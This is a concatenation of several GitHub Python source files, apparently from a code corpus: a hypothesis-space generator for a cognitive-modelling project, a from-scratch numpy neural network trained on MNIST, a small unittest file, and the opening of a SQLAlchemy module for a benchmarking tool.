(20,10) -> .769 | .75, .75, .9, .75, .8, .75, .7, .8 | .7749 Close
(20,5) -> .668 | .65, .625, .6, .66, .65, .63, .65, .75 | .6519 Close
(20,4) -> .607 | .60, .5725, .58, .63, .6, .6, .6, .6 | .5978 Close
(20,1) -> .591 | .5, .53125, .51, .5, .5, .5, .5, .5 | .5052 Eh
(40,5) -> .585 | .6, .5725, .65, .55, .6, .56, .5, .6 | .5791 Close
(40,10) -> .650 | .65, .625, .7, .6, .65, .63, .55, .65 | .6319 Close
(40,20) -> .777 | .75, .75, .95, .7, .8, .75, .75, .75 | .7749 Close
(40,40) -> .646 | 1.0, 1.0, 1.0, 1.0, .95, .9, 1.0, .9 | .9688 Eh
(80,1) -> .581 | .5, .515625, .51, .5, .65, .5, .5, .5 | .522 Eh
(80,5) -> .578 | .55, .53125, .55, .56, .75, .65, .5, .6 | .586 Close
(80,10) -> .605 | .6, .5725, .6, .67, .85, .75, .6, .7 | .668 Eh
(80,20) -> .683 | .65, .625, .65, .75, .95, .9, .65, .8 | .749 Eh
"""
"""
Model can't capture intuition that betting all your money means you
probably are going to win. I can modify it to capture that intuition, but
then the rest of the model breaks.
x axis - model judgement
y axis - participant judgement
"""
``` |
{
"source": "joeyginorio/CurseOfKnowledge",
"score": 4
} |
#### File: CurseOfKnowledge/src/GenerateHypothesisSpace.py
```python
import itertools
import numpy as np
class GenerateHypothesisSpace():
"""
Class which holds several hypothesis space generator functions.
"""
def __init__(self, blockList):
self.blockList = blockList
self.unorderedArgs = self.unorderedArgs(self.blockList)
self.orderedArgs = self.orderedArgs(self.blockList)
def simpleDepthSampler(self, depth, uniform):
"""
Samples AND, OR hypotheses at several depths.
"""
x = lambda x: ''.join(x) # Beautiful function to make hypotheses pretty
hypotheses = []
args = []
for i in range(1,depth+1):
args = itertools.chain(args, map(x,itertools.combinations('ABCDE',i)))
args = [[i] for i in args]
args = list(args)
y = lambda y: self.Or(*y)
for i in range(1, depth+1):
hypotheses = itertools.chain(hypotheses, map(y,
itertools.combinations('ABCDE',i)))
hypotheses = args + list(hypotheses)
# rid of duplicates
hypotheses = [tuple(i) for i in hypotheses]
hypotheses = set(hypotheses)
hypotheses = list(hypotheses)
hypotheses = [list(i) for i in hypotheses]
a = 0
if uniform:
prior = list()
prior = [1.0/len(hypotheses) for i in hypotheses]
else:
prior = list()
for h in hypotheses:
prior.append(1.0/self.priorHelp(h))
normal = sum(prior)
prior = [i/normal for i in prior]
return [hypotheses, prior, [''.join(i) for i in self.unorderedArgs]]
def depthSampler(self, depth, size, uniform=True):
"""
Samples AND, OR hypotheses at several depths.
"""
x = lambda x: ''.join(x) # Beautiful function to make hypotheses pretty
hypotheses = []
args = []
for i in range(1,depth+1):
args = itertools.chain(args, itertools.imap(x,itertools.combinations('ABCDE',i)))
args = list(args)
y = lambda y: self.Or(*y)
for i in range(1, depth+1):
hypotheses = itertools.chain(hypotheses, itertools.imap(y,
itertools.combinations(args,i)))
hypotheses = list(hypotheses)
hypotheses = [i for i in hypotheses if self.max_len(i) <= size]
hypotheses = [i for i in hypotheses if self.total_len(i) <= depth]
if uniform:
prior = list()
prior = [1.0/len(hypotheses) for i in hypotheses]
else:
prior = list()
for h in hypotheses:
prior.append(1.0/self.priorHelp(h))
normal = sum(prior)
prior = [i/(5+normal) for i in prior]
return [hypotheses, prior, [''.join(i) for i in self.unorderedArgs]]
"""
Same thing as depthSampler, except you first specify how many samples
you want from the hypothesis space depthSampler gives.
"""
def random_depth_sampler(self, samples, depth, uniform=True, th = ['BE']):
temp = self.depthSampler(depth,uniform)
hyps = temp[0]
arg = temp[2]
if len(hyps) < samples:
print 'Desired sample size is larger than total hypothesis space, choose larger depth'
return None
final_hyps = list()
final_hyps.append(th)
for i in range(samples-1):
ind = np.random.choice(len(hyps))
while hyps[ind] == th:
ind = np.random.choice(len(hyps))
temp = hyps.pop(ind)
final_hyps.append(temp)
if uniform:
prior = list()
prior = [1.0/len(final_hyps) for i in final_hyps]
np.random.shuffle(final_hyps)
return [final_hyps, prior, arg]
def random_teacher(self, num_examples):
temp = self.depthSampler(1,uniform=True)
examples = temp[2]
return list(np.random.choice(examples,size=num_examples,replace=False))
def permute_teacher(self, teacherData):
final_teacher_data = list()
if len(teacherData) < 8:
final_teacher_data = itertools.permutations(teacherData)
final_teacher_data = [list(i) for i in final_teacher_data]
else:
temp = teacherData
perms = set()
while len(perms) < 10000:
np.random.shuffle(temp)
perms.add(tuple(temp))
final_teacher_data = list(perms)
final_teacher_data = [list(i) for i in final_teacher_data]
return final_teacher_data
def priorHelp(self, hypothesis):
total = 0
for h in hypothesis:
total += len(h)
return total
def unorderedArgs(self, blockList):
"""
Generates a list of arguments for the unordered set of hypothesis
generators. Takes a blockList, and generates every combination.
Param:
blockList - a list of characters
uniform - boolean, if true, will set prior to uniform distribution
"""
# Initialize empty action space
args = list()
args += blockList
# Generate every possible combination of arguments from blockList
for i in range(2, len(blockList)+1):
for arg in itertools.combinations(blockList, i):
args.append(list(arg))
return args
def orderedArgs(self, blockList):
"""
Generates a list of arguments for the unordered set of hypothesis
generators. Takes a blockList, and generates every combination.
Param:
blockList - a list of characters
"""
# Initialize empty action space
args = list()
args += blockList
# Generate every possible combination of arguments from blockList
for i in range(2, len(blockList)+1):
for arg in itertools.permutations(blockList, i):
args.append(list(arg))
return args
def unorderedOr(self, uniform=True):
"""
Hypothesis Space #1:
Generates a list of hypotheses, including all combinations of
Or logic rules.
Param:
uniform - if true, prior for H is uniform, else t.b.d
"""
# Initializes hypothesis space and prior
hypothesisSpace = list()
hypothesisSpacePrior = list()
# Add the single-block hypotheses to hypothesis space
hypothesisSpace += [[i] for i in self.unorderedArgs[0:len(self.blockList)]]
# Remove the single-block hypotheses from arguments
args = self.unorderedArgs[len(self.blockList):]
# Use args as arguments for Or(), add to hyp. space
for arg in args:
hypothesisSpace.append(self.Or(*arg))
if uniform:
# Calculate prior distribution of hypothesis space
hypothesisSpacePrior = [1.0/len(self.unorderedArgs) for i in self.unorderedArgs]
return [hypothesisSpace, hypothesisSpacePrior, [''.join(i) for i in self.unorderedArgs]]
def unorderedAnd(self, uniform=True):
"""
Hypothesis Space #1:
Generates a list of hypotheses, including all combinations of
And logic rules.
Param:
uniform - if true, prior for H is uniform, else t.b.d
"""
# Initializes hypothesis space and prior
hypothesisSpace = list()
hypothesisSpacePrior = list()
# Add the single-block hypotheses to hypothesis space
hypothesisSpace += [[i] for i in self.unorderedArgs[0:len(self.blockList)]]
# Remove the single-block hypotheses from arguments
args = self.unorderedArgs[len(self.blockList):]
        # Use args as arguments for And(), add to hyp. space
for arg in args:
hypothesisSpace.append(self.And(*arg))
if uniform:
# Calculate prior distribution of hypothesis space
hypothesisSpacePrior = [1.0/len(self.unorderedArgs) for i in self.unorderedArgs]
return [hypothesisSpace, hypothesisSpacePrior, [''.join(i) for i in self.unorderedArgs]]
def unorderedAndDepth(self, depth, uniform=True):
"""
Hypothesis Space #1:
Generates a list of hypotheses, including all combinations of
And logic rules.
Param:
uniform - if true, prior for H is uniform, else t.b.d
"""
# Initializes hypothesis space and prior
hypothesisSpace = list()
hypothesisSpacePrior = list()
# Add the single-block hypotheses to hypothesis space
hypothesisSpace += [[i] for i in self.unorderedArgs[0:len(self.blockList)]]
# Remove the single-block hypotheses from arguments
args = self.unorderedArgs[len(self.blockList):]
args = [i for i in args if len(i) <= depth]
        # Use args as arguments for And(), add to hyp. space
for arg in args:
hypothesisSpace.append(self.And(*arg))
if uniform:
# Calculate prior distribution of hypothesis space
hypothesisSpacePrior = [1.0/len(hypothesisSpace) for i in hypothesisSpace]
else:
for h in hypothesisSpace:
hypothesisSpacePrior.append(1.0/self.priorHelp(h))
normal = sum(hypothesisSpacePrior)
hypothesisSpacePrior = [i/normal for i in hypothesisSpacePrior]
return [hypothesisSpace, hypothesisSpacePrior, [''.join(i) for i in self.unorderedArgs]]
def unorderedAndOr(self, uniform = True):
"""
Hypothesis Space # 3:
Generates a list of hypotheses, including all combinations of
And and Or logic rules.
Param:
            uniform - if true, prior for H is uniform, else t.b.d.
"""
# Initializes hypothesis space and prior
hypothesisSpace = list()
hypothesisSpacePrior = list()
# Add hypotheses to the hypothesis space
hypothesisSpace += [[i] for i in self.unorderedArgs[0:len(self.blockList)]]
# Remove the single-block hypotheses from arguments so they don't get
# needlessly duplicated.
args = self.unorderedArgs[len(self.blockList):]
# Use args as arguments for And() as well as Or(), add to hypothesis space
for arg in args:
hypothesisSpace.append(self.And(*arg))
hypothesisSpace.append(self.Or(*arg))
if uniform:
# Calculate prior distribution of hypothesis space
hypothesisSpacePrior = [1.0/len(hypothesisSpace) for i in hypothesisSpace]
# hypothesisSpace = all possible And & Or hypotheses
# hypothesisSpacePrior = either uniform, or simplicity biased (tba)
# the last statement makes up the actionSpace, by taking all the combinations
# we made in unorderedArgs and simply taking away all the spaces etc.
return [hypothesisSpace, hypothesisSpacePrior, [''.join(i) for i in self.unorderedArgs]]
def orderedAnd(self, uniform = True):
"""
Hypothesis space #4
Generates a list of ordered hypotheses, including all combinations
of the And logical operator.
"""
# Initializes the hypothesis space and prior
hypothesisSpace, hypothesisSpacePrior = list(), list()
# Add hypotheses to the hypothesis space:
hypothesisSpace += [[i] for i in self.orderedArgs[0:len(self.blockList)]]
# Remove the single-block hypotheses from the list of arguments
args = self.orderedArgs[len(self.blockList):]
# use the args as arguments for the And() function & add to hypothesisSpace
for arg in args:
hypothesisSpace.append(self.And(*arg))
if uniform:
# Calculate prior
hypothesisSpacePrior = [1.0/len(self.orderedArgs) for i in self.orderedArgs]
return [hypothesisSpace, hypothesisSpacePrior, [''.join(i) for i in self.unorderedArgs]]
def orderedAndOr(self, uniform = True):
"""
Hypothesis space # 5:
        Generates a list of ordered hypotheses, including all combinations of
the And && Or logical operators
"""
# Initializes the hypothesis space & prior
hypothesisSpace, hypothesisSpacePrior = list(), list()
# Add hypotheses to the hypothesis space:
hypothesisSpace += [[i] for i in self.orderedArgs[0:len(self.blockList)]]
# remove the single-block hypotheses from the list of arguments
args = self.orderedArgs[len(self.blockList):]
args2 = self.unorderedArgs[len(self.blockList):]
# use the args as arguments for the And() and Or() functions and add to hyopthesisSpace
for arg in args:
hypothesisSpace.append(self.And(*arg))
for arg in args2:
hypothesisSpace.append(self.Or(*arg))
if uniform:
# calculate prior
hypothesisSpacePrior = [1.0/len(hypothesisSpace) for i in hypothesisSpace]
return [hypothesisSpace, hypothesisSpacePrior, [''.join(i) for i in self.unorderedArgs]]
def Or(self, *args):
"""
Logical Or, e.g. Or('A','B') = ['A','B']
Can handle 2 or more arguments
Param:
*args - May accept any argument, but
for the model, block characters generally used
"""
# Our return list
temp = list()
# Sift through arguments to add to final list
for arg in args:
# If argument is a tuple, convert to list then add
if type(arg) is tuple:
temp.append(list(arg))
# Standard character, add as usual
else:
temp.append(arg)
return temp
# def And(self, *args):
# """
# Logical And, e.g. And('A','B') -> ['AB','BA']
# Can handle 2 or more arguments.
# Param:
# *args - May accept any argument, but
# for the model, block characters generally used.
# """
# args = list(args)
# # Convert arguments to list if not already
# for i in range(len(args)):
# if type(args[i]) is not list:
# args[i] = list([args[i]])
# # Initialize final list
# final = list()
# # Generate all permutations of arguments
# temp = list(itertools.permutations(args))
# # Compute all products within each permutation
# for arg in temp:
# final.append(list([''.join(s) for s in list(itertools.product(*arg))]))
# return [''.join(i) for i in final]
def And(self,*args):
args = list(args)
for i in range(len(args)):
if type(args[i]) is not list:
args[i] = list([args[i]])
return [''.join(s) for s in list(itertools.product(*args))]
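    # Hedged worked examples of the two operators above:
    #   Or('A', ('B', 'C'))  -> ['A', ['B', 'C']]
    #   And('A', 'BC')       -> ['ABC']   (joins the cartesian product of the arguments)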
def total_len(self, hyp):
total = 0
for h in hyp:
total += len(h)
return total
def max_len(self, hyp):
max_len = 0
for h in hyp:
if max_len < len(h):
max_len = len(h)
return max_len
``` |
{
"source": "joeyginorio/Neural-Network",
"score": 4
} |
#### File: joeyginorio/Neural-Network/NeuralNetwork.py
```python
import numpy as np
import scipy.special
# Generates a neural network of any depth
class NeuralNetwork:
# Initialize the network
def __init__(self, depth, iNodes, hNodes, oNodes, learningRate):
# Set dimensions of network
self.iNodes = iNodes
self.depth = depth
self.hNodes = hNodes
self.oNodes = oNodes
self.learningRate = learningRate
# Initialize weights
        # Uses the sampling trick for a better initial value
self.w = list()
# Weights for input->hidden
self.w.append(np.random.normal(0.0, pow(self.hNodes, -.5),
(self.hNodes, self.iNodes)))
# Weights for hidden->hidden
for i in range(self.depth-1):
self.w.append(np.random.normal(0.0, pow(self.hNodes,-.5),
(self.hNodes, self.hNodes)))
# Weights for hidden->output
self.w.append(np.random.normal(0.0, pow(self.oNodes, -.5),
(self.oNodes, self.hNodes)))
self.activationFunction = lambda x: scipy.special.expit(x)
self.inverseActivationFunction = lambda x: scipy.special.logit(x)
# Train the network
def train(self, inputs_list, targets_list):
##################### FEED FORWARD #############################
# Initialize input/output/error/weightUpdate lists
self.inputs = list()
self.outputs = list()
self.errors = np.empty([len(self.w),1]).tolist()
self.wUpdate = np.empty([len(self.w),1]).tolist()
# Initial input / target
self.inputs.append(np.array(inputs_list, ndmin=2).T)
self.outputs.append(self.inputs[0])
self.targets = np.array(targets_list, ndmin=2).T
# Calculate input/output for input->hidden
self.inputs.append(np.dot(self.w[0], self.outputs[0]))
self.outputs.append(self.activationFunction(self.inputs[1]))
# Calculate input/output for hidden->hidden
for i in xrange(1, self.depth):
self.inputs.append(np.dot(self.w[i],self.outputs[i]))
self.outputs.append(self.activationFunction(self.inputs[i+1]))
# Calculate input/output for hidden->output
self.inputs.append(np.dot(self.w[-1], self.outputs[-1]))
self.outputs.append(self.activationFunction(self.inputs[-1]))
################## BACK PROPAGATE ##############################
# Calculate initial error (from output layer)
self.errors[-1] = self.targets - self.outputs[-1]
self.wUpdate[-1] = self.learningRate * np.dot(self.errors[-1] * \
self.outputs[-1] * (1 - self.outputs[-1]), self.outputs[-2].T)
self.w[-1] += self.wUpdate[-1]
# Calculate back-propagated error for rest of network
for i in xrange(2, len(self.w) + 1):
# Allows the loop to run even if only one hidden layer present
if i > len(self.w):
break
self.errors[-i] = np.dot(self.w[-(i-1)].T, self.errors[-(i-1)])
self.wUpdate[-i] = self.learningRate * np.dot(self.errors[-i] *
self.outputs[-i] * (1-self.outputs[-i]), self.outputs[-(i+1)].T)
self.w[-i] += self.wUpdate[-i]
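    # Hedged summary of the update coded above: for each layer with sigmoid outputs O,
    #   delta_W = learningRate * (error * O * (1 - O)) . O_previous^T
    # i.e. plain gradient descent on the squared error, with errors back-propagated via W^T.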
# Query the network
def query(self, inputs_list):
# Initialize input/output lists
self.inputs = list()
self.outputs = list()
# Initial input
self.inputs.append(np.array(inputs_list, ndmin=2).T)
self.outputs.append(self.inputs[0])
# Calculate input/output for input->hidden
self.inputs.append(np.dot(self.w[0], self.outputs[0]))
self.outputs.append(self.activationFunction(self.inputs[1]))
# Calculate input/output for hidden->hidden
for i in xrange(1, self.depth):
self.inputs.append(np.dot(self.w[i],self.outputs[i]))
self.outputs.append(self.activationFunction(self.inputs[i+1]))
# Calculate input/output for hidden->output
self.inputs.append(np.dot(self.w[-1], self.outputs[-1]))
self.outputs.append(self.activationFunction(self.inputs[-1]))
return self.outputs[-1]
# Peek into the mind of the network!
def backquery(self, targets_list):
# Convert list to numpy array
self.targets = np.array(targets_list, ndmin=2).T
self.inputs = np.empty([len(self.inputs),1]).tolist()
self.outputs = np.empty([len(self.inputs),1]).tolist()
# Calculate output/input of output layer
self.outputs[-1] = self.targets
self.inputs[-1] = self.inverseActivationFunction(self.targets)
# Calculate output/input for hidden<-output w/rescaling
self.outputs[-2] = np.dot(self.w[-1].T, self.inputs[-1])
self.outputs[-2] -= self.outputs[-2].min()
self.outputs[-2] /= self.outputs[-2].max()
self.outputs[-2] *= .98
self.outputs[-2] += .01
self.inputs[-2] = self.inverseActivationFunction(self.outputs[-2])
# Calculate output/input for hidden<-hidden w/rescaling
for i in xrange(1, self.depth-1):
self.outputs[-(i+2)] = np.dot(self.w[-(i+1)].T, self.inputs[-(i+1)])
self.outputs[-(i+2)] -= self.outputs[-(i+2)].min()
self.outputs[-(i+2)] /= self.outputs[-(i+2)].max()
self.outputs[-(i+2)] *= .98
self.outputs[-(i+2)] += .01
self.inputs[-(i+2)] = self.inverseActivationFunction(self.outputs[-(i+2)])
# Calculate output/input for input<-hidden w/rescaling for both
self.outputs[0] = np.dot(self.w[0].T, self.inputs[1])
self.outputs[0] -= self.outputs[0].min()
self.outputs[0] /= self.outputs[0].max()
self.outputs[0] *= .98
self.outputs[0] += .01
self.inputs[0] = self.inverseActivationFunction(self.outputs[0])
self.inputs[0] -= self.inputs[0].min()
self.inputs[0] /= self.inputs[0].max()
self.inputs[0] *= .98
self.inputs[0] += .01
return self.inputs[0]
# Test Script for MNIST digit classification
# Specify the network parameters
numH = 1
iNodes = 784
hNodes = 200
oNodes = 10
learningRate = .2
epochs = 5
# Instantiate the network
NN = NeuralNetwork(numH, iNodes, hNodes, oNodes, learningRate)
# Load train / test datasets
trainingFile = open("mnist_train.csv", 'r')
trainingData = trainingFile.readlines()
trainingFile.close()
testingFile = open("mnist_test.csv", 'r')
testingData = testingFile.readlines()
testingFile.close()
# Retrain over epochs
for i in range(epochs):
# Train all images in MNIST training set
for image in trainingData:
# Convert csv to vector form
image = image.split(',')
# Hold onto label index
labelIndex = int(image[0])
# Process rest of vector into scaled image pixel array
image = np.array(image[1:], dtype='float64')
image /= 255.0
image *= .99
image += .01
# Generate targets vector
targets = np.zeros(oNodes) + .01
targets[labelIndex] = .99
NN.train(image, targets)
# Keep track of network performance
scores = list()
answers = list()
finalResults = list()
# Test for all images in MNIST test set
for image in testingData:
# Convert csv into vector form
image = image.split(',')
# Hold onto label index / info
correctLabel = int(image[0])
answers.append(correctLabel)
# Scale and shift image
image = np.array(image[1:], dtype='float')
image /= 255.0
image *= .99
image += .01
# Query the network
results = NN.query(image)
label = np.argmax(results)
finalResults.append(label)
if(label == correctLabel):
scores.append(1)
else:
scores.append(0)
scores = np.array(scores)
print "Performance: {}".format(float(scores.sum())/scores.size)
# Notes: Add intermediate results
# Output the hidden layer as well
``` |
{
"source": "joeyguerra/python-starter",
"score": 3
} |
#### File: joeyguerra/python-starter/test_mytest.py
```python
import unittest
# Unittest test
class MyTest(unittest.TestCase):
def test_method1(self):
actual = 1
expected = 1
        self.assertEqual(actual, expected)
def test_method2(self):
actual = 1
expected = 2
        self.assertNotEqual(actual, expected)
``` |
{
"source": "Joeyhana/TRPN",
"score": 3
} |
#### File: Joeyhana/TRPN/model.py
```python
from torchtools import *
from collections import OrderedDict
import math
#import seaborn as sns
import numpy as np
import matplotlib.pyplot as plt
from torch.nn.parameter import Parameter
class GraphConvolution(nn.Module):
"""
Simple GCN layer, similar to https://arxiv.org/abs/1609.02907
"""
def __init__(self, in_features, out_features, bias=True):
super(GraphConvolution, self).__init__()
self.in_features = in_features
self.out_features = out_features
self.weight = Parameter(torch.FloatTensor(in_features, out_features).to(tt.arg.device))
if bias:
self.bias = Parameter(torch.FloatTensor(out_features).to(tt.arg.device))
else:
self.register_parameter('bias', None)
self.reset_parameters()
def reset_parameters(self):
stdv = 1. / math.sqrt(self.weight.size(1))
self.weight.data.uniform_(-stdv, stdv)
if self.bias is not None:
self.bias.data.uniform_(-stdv, stdv)
def forward(self, input, adj):
# print('device:', input.device, self.weight.device)
support = torch.mm(input, self.weight)
output = torch.spmm(adj, support)
if self.bias is not None:
return output + self.bias
else:
return output
def norm(self, adj, symmetric=True):
# A = A+I
new_adj = adj + torch.eye(adj.size(0)).to(tt.arg.device)
        # degree of every node (row sums of A + I)
degree = new_adj.sum(1)
if symmetric:
# degree = degree^-1/2
degree = torch.diag(torch.pow(degree, -0.5))
return degree.mm(new_adj).mm(degree)
else:
# degree=degree^-1
degree = torch.diag(torch.pow(degree, -1))
return degree.mm(new_adj)
def __repr__(self):
return self.__class__.__name__ + ' (' \
+ str(self.in_features) + ' -> ' \
+ str(self.out_features) + ')'
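# Hedged numeric sketch of GraphConvolution.norm (hypothetical 2-node graph):
#   adj = [[0, 1], [1, 0]]  ->  A + I = [[1, 1], [1, 1]], degrees = [2, 2]
#   symmetric=True returns D^-1/2 (A + I) D^-1/2 = [[0.5, 0.5], [0.5, 0.5]]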
class TRPN(nn.Module):
def __init__(self, n_feat, n_queries, hidden_layers = [640,320,320,160]):
super(TRPN, self).__init__()
#self.layer_last = nn.Sequential(nn.Linear(in_features=512,
# out_features=128, bias=True),
# nn.BatchNorm1d(128))
self.fc_1 = nn.Sequential(nn.Linear(in_features=n_feat * 2, out_features=hidden_layers[0], bias=True),
nn.ReLU(),
nn.Linear(in_features=hidden_layers[0], out_features=hidden_layers[1], bias=True),
nn.ReLU(),
nn.Linear(in_features=hidden_layers[1], out_features=1, bias=True),
nn.Sigmoid())
self.fc_2 = nn.Sequential(nn.Linear(in_features=n_feat * (n_queries + 1), out_features=hidden_layers[2], bias=True),
nn.ReLU(),
nn.Linear(in_features=hidden_layers[2], out_features=hidden_layers[3], bias=True),
nn.ReLU(),
nn.Linear(in_features=hidden_layers[3], out_features=n_queries, bias=True),
nn.Sigmoid())
self.gc = GraphConvolution(n_feat * (n_queries + 1), n_feat * (n_queries + 1))
def forward(self, node_feat, adj):
# node_feat: batch_size(num_tasks) x num_samples x in_features
# adj: batch_size(num_tasks) x num_supports x num_supports [0, 1]
#node_feat = self.layer_last(node_feat.view(-1,512)).view(-1, 30, 128)
num_tasks = node_feat.size(0)
num_samples = node_feat.size(1)
num_supports = adj.size(1)
num_queries = num_samples - num_supports
in_features_2 = node_feat.size(2) * 2
x_i = node_feat.unsqueeze(2).repeat(1, 1, node_feat.size(1), 1)
x_j = torch.transpose(x_i, 1, 2)
x_ij = torch.cat((x_i, x_j), -1)
# batch_size x num_samples x (in_features * (num_queries + 1))
gcn_input_feat = node_feat
for i in range(num_queries):
gcn_input_feat = torch.cat((gcn_input_feat, node_feat[:, num_supports + i, :].unsqueeze(1).repeat(1, num_samples, 1)), -1)
learned_score_list = []
query_score_list = []
for i in range(num_tasks):
# num_samples x num_samples
learned_score = self.fc_1(x_ij[i].contiguous().view(num_samples ** 2, in_features_2)).view(num_samples, num_samples)
learned_adj = learned_score.clone()
ones = torch.ones(learned_adj[:num_supports, :num_supports].size()).to(tt.arg.device)
if tt.arg.num_unlabeled >0:
learned_adj[:num_supports, :num_supports] = torch.where(adj[i] == 1.0, ones ,learned_adj[:num_supports, :num_supports])
learned_adj[:num_supports, :num_supports] = torch.where(adj[i] == 0,-learned_adj[:num_supports, :num_supports],learned_adj[:num_supports, :num_supports])
else:
learned_adj[:num_supports, :num_supports] = torch.where(adj[i] > 0, ones, -learned_adj[:num_supports, :num_supports])
# num_samples x num_queries
query_score = self.fc_2(F.relu(self.gc(gcn_input_feat[i], learned_adj)))
learned_score_list.append(learned_score)
query_score_list.append(query_score)
# query_score_list: batch_size x num_queries x num_samples
# learned_score_list: batch_size x num_samples x num_samples
return torch.stack(query_score_list, 0).transpose(1, 2), torch.stack(learned_score_list, 0)
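    # Hedged shape walk-through for forward() (hypothetical sizes: n_feat=128, 4 tasks,
    # 25 supports and 5 queries, so 30 samples per task):
    #   x_ij is 4 x 30 x 30 x 256 and fc_1 scores every sample pair;
    #   gcn_input_feat is 4 x 30 x (128 * 6); the returned tensors are
    #   query scores of shape 4 x 5 x 30 and learned adjacencies of shape 4 x 30 x 30.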
``` |
{
"source": "joeyhaohao/deep-learning",
"score": 3
} |
#### File: deep-learning/cnn/eval.py
```python
import time
import numpy as np
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
import train
import inference
# Evaluate accuracy of new model every 60 sec
EVAL_INTERVAL = 60
DATA_PATH = "/tmp/mnist_data/"
def evaluate(mnist):
with tf.Graph().as_default() as g:
feature = tf.placeholder(tf.float32, [None,
inference.IMAGE_SIZE,
inference.IMAGE_SIZE,
inference.NUM_CHANNELS], name="feature")
label = tf.placeholder(tf.float32, [None, inference.OUTPUT_SIZE], name="label")
y = inference.inference(feature, False, None)
correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(label, 1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
# variable_averages = tf.train.ExponentialMovingAverage(train.MOVING_AVERAGE_DECAY)
# variable_to_restore = variable_averages.variables_to_restore()
saver = tf.train.Saver()
valid_x = np.reshape(mnist.validation.images,
[mnist.validation.num_examples,
inference.IMAGE_SIZE,
inference.IMAGE_SIZE,
inference.NUM_CHANNELS])
test_x = np.reshape(mnist.test.images,
[mnist.test.num_examples,
inference.IMAGE_SIZE,
inference.IMAGE_SIZE,
inference.NUM_CHANNELS])
while True:
with tf.Session() as sess:
ckpt = tf.train.get_checkpoint_state(train.MODEL_PATH)
if ckpt and ckpt.model_checkpoint_path:
saver.restore(sess, ckpt.model_checkpoint_path)
global_step = ckpt.model_checkpoint_path.split('/')[-1].split('-')[-1]
valid_acc = sess.run(accuracy,
feed_dict={feature: valid_x,
label: mnist.validation.labels})
test_acc = sess.run(accuracy,
feed_dict={feature: test_x,
label: mnist.test.labels})
print("Valid acc at step {}: {}".format(global_step, valid_acc))
print("Test acc at step {}: {}".format(global_step, test_acc))
else:
print("No checkpoint found.")
return
time.sleep(EVAL_INTERVAL)
def main(_):
mnist = input_data.read_data_sets(DATA_PATH, one_hot=True)
evaluate(mnist)
if __name__=='__main__':
tf.app.run()
```
#### File: deep-learning/fully_connected_nn/inference.py
```python
import tensorflow as tf
INPUT_SIZE = 784
HIDDEN_SIZE = 512
OUTPUT_SIZE = 10
def summaries(var, name):
with tf.name_scope("summaries"):
tf.summary.histogram(name, var)
mean = tf.reduce_mean(var)
tf.summary.scalar('mean/'+name, mean)
stddev = tf.sqrt(tf.reduce_mean(tf.square(var-mean)))
tf.summary.scalar('stddev/'+name, stddev)
def inference(input_tensor, regularizer):
with tf.variable_scope("layer1", reuse=tf.AUTO_REUSE):
weights = tf.get_variable("weights", shape=[INPUT_SIZE, HIDDEN_SIZE],
initializer=tf.truncated_normal_initializer(stddev=0.1))
summaries(weights, 'layer1/weights')
if regularizer!=None:
tf.add_to_collection("losses", regularizer(weights))
biases = tf.get_variable("biases", [HIDDEN_SIZE],
initializer=tf.constant_initializer(0.0))
summaries(weights, 'layer1/biases')
layer1 = tf.nn.relu(tf.matmul(input_tensor, weights) + biases)
summaries(weights, 'layer1/activation')
tf.summary.histogram('layer1/activations', layer1)
with tf.variable_scope("layer2", reuse=tf.AUTO_REUSE):
weights = tf.get_variable("weights", shape=[HIDDEN_SIZE, OUTPUT_SIZE],
initializer=tf.truncated_normal_initializer(stddev=0.1))
if regularizer!=None:
tf.add_to_collection("losses", regularizer(weights))
biases = tf.get_variable("biases", [OUTPUT_SIZE],
initializer=tf.constant_initializer(0.0))
layer2 = tf.matmul(layer1, weights) + biases
return layer2
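# Hedged usage sketch (TF1-style; the l2 regularizer is one possible choice, not mandated here):
#   x = tf.placeholder(tf.float32, [None, INPUT_SIZE])
#   logits = inference(x, tf.contrib.layers.l2_regularizer(0.0001))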
```
#### File: lstm/poem_generator/train.py
```python
import os
import tensorflow as tf
import model
def run_training(batch_size, hidden_size, time_steps, learning_rate, num_epoch, vocab_size,
poems, generator, encoder, decoder, model_dir, write_mode):
start_token = encoder['s']
with tf.variable_scope("model", reuse=tf.AUTO_REUSE):
input_poem = tf.placeholder(tf.int32, [None, time_steps + 1])
x = input_poem[:, :-1]
target = input_poem[:, 1:]
y = model.build_model(x, batch_size, hidden_size, vocab_size, time_steps)
poem_write = model.write_model(hidden_size, vocab_size, time_steps, write_mode,
None, start_token)
loss = -tf.reduce_sum(y.log_prob(target))
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)
train_op = optimizer.minimize(loss)
init_op = tf.group(tf.global_variables_initializer(),
tf.local_variables_initializer())
saver = tf.train.Saver(tf.global_variables())
with tf.Session() as sess:
sess.run(init_op)
# checkpoint = tf.train.latest_checkpoint(model_dir)
ckpt = tf.train.get_checkpoint_state(model_dir)
if ckpt:
saver.restore(sess, ckpt.model_checkpoint_path)
n_iter_per_epoch = len(poems) // batch_size
try:
for epoch in range(num_epoch):
for step in range(n_iter_per_epoch):
data = next(generator(poems, batch_size, encoder))
[_, loss_value] = sess.run([train_op, loss],
feed_dict={input_poem: data})
if (step + 1) % 10 == 0:
print("Epoch: {}, batch: {}, average training loss: {:0.5f}".format(
epoch, step, loss_value / batch_size))
sample = sess.run(poem_write)
sample = ''.join([decoder[c] for c in sample])
print("Sample poem:")
for i in range(4):
print(sample[i*12: (i+1)*12])
saver.save(sess, os.path.join(model_dir, "model.ckpt"), global_step=epoch)
except KeyboardInterrupt:
print('Interrupt manually, try saving checkpoint...')
saver.save(sess, os.path.join(model_dir, "model.ckpt"), global_step=epoch)
print('Checkpoint saved.')
``` |
{
"source": "JoeyHendricks/PyBench",
"score": 2
} |
#### File: Benchmarking/_database/collection.py
```python
from .._database.common import CommonDatabaseInteractions
from .._utilities.defaults import default_sqlite_database_name
from .._configuration import options
from sqlalchemy import select, func
from tempfile import gettempdir
class Create(CommonDatabaseInteractions):
def __init__(self):
super(Create, self).__init__()
def insert_performance_statistics(self, url: str, payload: list, tcn: str) -> None:
"""
:param url:
:param payload:
:param tcn:
:return:
"""
return self.bulk_insert(
connection_url=url,
table=self.c_profiler_statistics_data_model(test_case_name=tcn),
payload=payload
)
def insert_boundary_verification_results(self, url: str, payload: list, tcn: str) -> None:
"""
:param url:
:param payload:
:param tcn:
:return:
"""
return self.bulk_insert(
connection_url=url,
table=self.boundary_test_report_model(test_case_name=tcn),
payload=payload
)
class Read(CommonDatabaseInteractions):
def __init__(self):
